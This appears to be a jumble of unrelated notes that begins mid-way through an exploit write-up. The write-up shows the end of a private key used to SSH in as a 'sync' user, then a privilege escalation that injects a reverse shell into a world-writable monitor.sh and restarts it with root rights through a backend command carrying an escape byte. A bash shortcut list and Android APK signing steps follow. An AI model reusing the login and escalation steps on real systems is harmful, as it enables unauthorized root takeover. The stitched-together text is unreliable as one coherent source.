OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
+sqSEhA35Le2kC4Y1/A=
-----END DSA PRIVATE KEY-----
EOF

Change the permissions of the synckey file:

chmod 600 ~/synckey

Log in to the system with this private key:

ssh -i ~/synckey sync@x.x.x.x /bin/sh

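Privilege escalation

/ca/bin/monitor.sh and /ca/bin/debug_syn_stat are world-writable by default (mode 777).
A script written into monitor.sh runs with root privileges when it is restarted through the debug monitor option.
As the sync user, run the /ca/bin/backend tool and restart the debug monitor as follows.
Turn the debug monitor off:

/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`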

Turn the debug monitor on:

/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`

Writing a reverse-shell command into /ca/bin/monitor.sh and carrying out the steps above returns a root shell.

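Shortcut           Action
Ctrl + a           Move to the start of the command line
Ctrl + e           Move to the end of the command line
Ctrl + f           Move forward one character (to the right)
Ctrl + b           Move backward one character (to the left)
Alt + f            Move forward one word (to the right)
Alt + b            Move backward one word (to the left)
Ctrl + xx          Move between the start of the command line and the cursor
Ctrl + u           Delete from the cursor to the start of the command line
Ctrl + k           Delete from the cursor to the end of the command line
Ctrl + w           Delete from the cursor to the start of the word
Alt + d            Delete from the cursor to the end of the word
Ctrl + d           Delete the character under the cursor
Ctrl + h           Delete the character before the cursor
Ctrl + y           Paste after the cursor
Alt + c            Capitalize the word from the cursor
Alt + u            Uppercase the word from the cursor
Alt + l            Lowercase the word from the cursor
Ctrl + t           Swap the character under the cursor with the one before it
Alt + t            Swap the word under the cursor with the one before it
Alt + Backspace    Similar to Ctrl + w

Re-running commands
Ctrl + r           Reverse-search the command history
Ctrl + g           Exit history search mode
Ctrl + p           Previous command in the history
Ctrl + n           Next command in the history
Alt + .            Use the last argument of the previous command

Control commands
Ctrl + l           Clear the screen
Ctrl + o           Execute the current command and select the previous command
Ctrl + s           Stop output to the screen
Ctrl + q           Allow output to the screen
Ctrl + c           Terminate the command
Ctrl + z           Suspend the command

Bang (!) commands
!!                 Run the previous command
!blah              Run the most recent command starting with blah, e.g. !ls
!blah:p            Print only, without executing
!$                 The last argument of the previous command, same as Alt + .
!$:p               Print the contents of !$
!*                 All arguments of the previous command
!*:p               Print the contents of !*
^blah              Delete blah from the previous command
^blah^foo          Replace blah with foo in the previous command
^blah^foo^         Replace every blah with foo in the previous command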

First, if you do not have a signing key, generate one:

keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore

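You will then be prompted for a password, region, country and so on; enter them as prompted.
Here my username and password are both android.

Then sign with the key:

jarsigner -keystore android.keystore -storepass android -keypass android XXX.apk android.keystore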

keytool and jarsigner both ship with the JDK; once the environment variables are set up, you can use them directly from the command line.
